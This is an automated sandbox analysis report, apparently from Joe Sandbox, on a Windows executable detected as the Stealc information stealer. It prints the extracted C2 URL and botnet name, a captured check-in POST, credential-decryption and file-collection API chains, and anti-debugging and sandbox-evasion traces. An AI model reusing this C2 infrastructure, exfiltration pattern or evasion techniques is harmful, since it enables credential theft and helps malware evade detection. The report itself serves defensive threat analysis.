Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1525249
MD5: 622f9f481586d5dca1356051e20c13fa
SHA1: 4e56e103cdb596ddad6076de8132d9839abd0b3d
SHA256: 75e9d83e734f70de74b22032c01c7adee9bc2b0244ab7506bc59c5adc27d81a6
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 6668 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 622F9F481586D5DCA1356051E20C13FA)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relied on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Malware configuration: {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Yara matches (network traffic)
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security |

Yara matches (memory dumps)
Source | Rule | Description | Author | Strings
00000000.00000002.1777021191.0000000000E2E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000003.1736083910.0000000004AE0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
Process Memory Space: file.exe PID: 6668 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Process Memory Space: file.exe PID: 6668 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |

Yara matches (unpacked PE files)
Source | Rule | Description | Author | Strings
0.2.file.exe.560000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |

Sigma: No Sigma rule has matched

Suricata IDS alerts
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-03T23:41:06.892569+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 185.215.113.37 | 80 | TCP


                AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.37/ | URL Reputation: Label: malware
Source: http://185.215.113.37 | URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php | URL Reputation: Label: malware
Source: 0.2.file.exe.560000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0056C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00567240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00569AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00569B60 CryptUnprotectData,LocalAlloc,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00578EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005738B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00574910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0056DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0056E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00574570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0056ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0056BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0056DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005616D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0056F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00573EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose

                Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: 185.215.113.37
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    POST /e2b1563c6670f193.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----CGIDAAAKJJDBGCBFCBGI
    Host: 185.215.113.37
    Content-Length: 211
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Raw: 2d 2d 2d 2d 2d 2d 43 47 49 44 41 41 41 4b 4a 4a 44 42 47 43 42 46 43 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 38 30 42 35 30 34 37 33 32 42 43 34 31 35 38 31 33 35 32 33 36 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 44 41 41 41 4b 4a 4a 44 42 47 43 42 46 43 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 44 41 41 41 4b 4a 4a 44 42 47 43 42 46 43 42 47 49 2d 2d 0d 0a
    Data Ascii:
    ------CGIDAAAKJJDBGCBFCBGI
    Content-Disposition: form-data; name="hwid"

    F80B504732BC4158135236
    ------CGIDAAAKJJDBGCBFCBGI
    Content-Disposition: form-data; name="build"

    doma
    ------CGIDAAAKJJDBGCBFCBGI--
Source: Joe Sandbox View | IP Address: 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00564880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
Source: file.exe, 00000000.00000002.1777021191.0000000000E2E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.1777021191.0000000000E2E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1777021191.0000000000E87000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.1777021191.0000000000E87000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/X
Source: file.exe, 00000000.00000002.1777021191.0000000000E87000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.1777021191.0000000000E87000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php-
Source: file.exe, 00000000.00000002.1777021191.0000000000E87000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php/
Source: file.exe, 00000000.00000002.1777021191.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpU
Source: file.exe, 00000000.00000002.1777021191.0000000000E87000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/ws

                System Summary

Source: file.exe | Static PE information: section name: (empty)
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (empty)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00803085
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00940884
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009BA8A3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00937044
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00933A84
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00813A0E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008FDA6E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0089F3B2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00938B46
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00939CB6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0093F4E1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00934D1E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008B4688
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008DF79E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00832FB7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00903F2E
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 005645C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: zlxgcsga ZLIB complexity 0.9952391112695078
Source: file.exe, 00000000.00000003.1736083910.0000000004AE0000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00579600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00573720 CoCreateInstance,MultiByteToWideChar,lstrcpyn
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\L3YU8IX6.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 1862144 > 1048576
Source: file.exe | Static PE information: Raw size of zlxgcsga is bigger than: 0x100000 < 0x1a0800

                Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.560000.0.unpack :EW;.rsrc :W;.idata :W; :EW;zlxgcsga:EW;bzmpgjce:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;zlxgcsga:EW;bzmpgjce:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00579860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1d2cf6 should be: 0x1d463c
Source: file.exe | Static PE information: section name: (empty)
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (empty)
Source: file.exe | Static PE information: section name: zlxgcsga
Source: file.exe | Static PE information: section name: bzmpgjce
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00803085 push 37B28704h; mov dword ptr [esp], edi | 0_2_008031C2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00803085 push 163E3B61h; mov dword ptr [esp], ecx | 0_2_008031CD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00940884 push ecx; mov dword ptr [esp], ebp | 0_2_00940889
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00940884 push ecx; mov dword ptr [esp], esp | 0_2_0094088D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00940884 push 4316F48Ah; mov dword ptr [esp], esi | 0_2_0094089D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00940884 push edi; mov dword ptr [esp], eax | 0_2_00940956
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00940884 push eax; mov dword ptr [esp], ecx | 0_2_0094096F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00940884 push 346F58D7h; mov dword ptr [esp], ecx | 0_2_00940A9C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00940884 push 49094878h; mov dword ptr [esp], eax | 0_2_00940AA6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00940884 push eax; mov dword ptr [esp], edx | 0_2_00940B8E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00940884 push 546E04EEh; mov dword ptr [esp], edi | 0_2_00940C90
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00940884 push 422C7805h; mov dword ptr [esp], edi | 0_2_00940CB7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00940884 push 64A67E3Bh; mov dword ptr [esp], ecx | 0_2_00940CC1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00940884 push 535CD4C1h; mov dword ptr [esp], edx | 0_2_00940D50
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00940884 push esi; mov dword ptr [esp], eax | 0_2_00940D9D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00940884 push 5EB055CCh; mov dword ptr [esp], esp | 0_2_00940E1B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00940884 push ecx; mov dword ptr [esp], 1CF66EBEh | 0_2_00940E33
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00940884 push 4B23C2BCh; mov dword ptr [esp], eax | 0_2_00940E4D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00940884 push edx; mov dword ptr [esp], esi | 0_2_00940E68
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00940884 push ebx; mov dword ptr [esp], eax | 0_2_00940E97
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00940884 push 7D70C5A7h; mov dword ptr [esp], eax | 0_2_00940F28
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00940884 push ebx; mov dword ptr [esp], edx | 0_2_00940FC9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00940884 push ebp; mov dword ptr [esp], ecx | 0_2_00941006
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00940884 push 4A2E3A96h; mov dword ptr [esp], eax | 0_2_0094104C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00940884 push 1E424023h; mov dword ptr [esp], ecx | 0_2_00941059
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00940884 push ebp; mov dword ptr [esp], edi | 0_2_00941187
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00940884 push 1B3CC300h; mov dword ptr [esp], edx | 0_2_00941191
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00940884 push ebp; mov dword ptr [esp], edx | 0_2_009411A0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00940884 push 537378B7h; mov dword ptr [esp], ebp | 0_2_009411DC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00940884 push eax; mov dword ptr [esp], ebx | 0_2_00941223
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00940884 push 49CFD8C1h; mov dword ptr [esp], edx | 0_2_00941279
Source: file.exe | Static PE information: section name: zlxgcsga entropy: 7.954773553476413

                Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00579860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress

                Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7C190F second address: 7C1913 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7C1913 second address: 7C1919 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 93CE9A second address: 93CEBD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F7CC8D8AE31h 0x0000000a push edx 0x0000000b pop edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 pushad 0x00000015 popad 0x00000016 pop eax 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 93CEBD second address: 93CEC2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 944F6D second address: 944F71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 944F71 second address: 944F75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 948A6F second address: 948A93 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jmp 00007F7CC8D8AE2Ch 0x00000016 jbe 00007F7CC8D8AE26h 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 948A93 second address: 948AB2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7CC902C40Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push esi 0x0000000f pop esi 0x00000010 jl 00007F7CC902C406h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 948BB9 second address: 948BC2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 948BC2 second address: 948C38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 jnp 00007F7CC902C406h 0x0000000f push 00000000h 0x00000011 mov edx, dword ptr [ebp+122D29F9h] 0x00000017 push 8131CF15h 0x0000001c pushad 0x0000001d push edi 0x0000001e jp 00007F7CC902C406h 0x00000024 pop edi 0x00000025 jmp 00007F7CC902C416h 0x0000002a popad 0x0000002b add dword ptr [esp], 7ECE316Bh 0x00000032 xor dword ptr [ebp+122D33D9h], eax 0x00000038 push 00000003h 0x0000003a jl 00007F7CC902C40Ch 0x00000040 mov ecx, dword ptr [ebp+122D2839h] 0x00000046 push 00000000h 0x00000048 cld 0x00000049 mov ecx, dword ptr [ebp+122D29EDh] 0x0000004f push 00000003h 0x00000051 mov dword ptr [ebp+122D19D9h], eax 0x00000057 push C52A288Bh 0x0000005c pushad 0x0000005d jc 00007F7CC902C40Ch 0x00000063 push eax 0x00000064 push edx 0x00000065 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 948C38 second address: 948C3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 948DCE second address: 948E03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F7CC902C40Fh 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d jnl 00007F7CC902C40Ah 0x00000013 push esi 0x00000014 pushad 0x00000015 popad 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F7CC902C40Eh 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 968884 second address: 96888D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 93B2B7 second address: 93B2BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 93B2BD second address: 93B2C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 93B2C5 second address: 93B2D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 jbe 00007F7CC902C424h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 93B2D4 second address: 93B2FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7CC8D8AE38h 0x00000009 popad 0x0000000a pushad 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
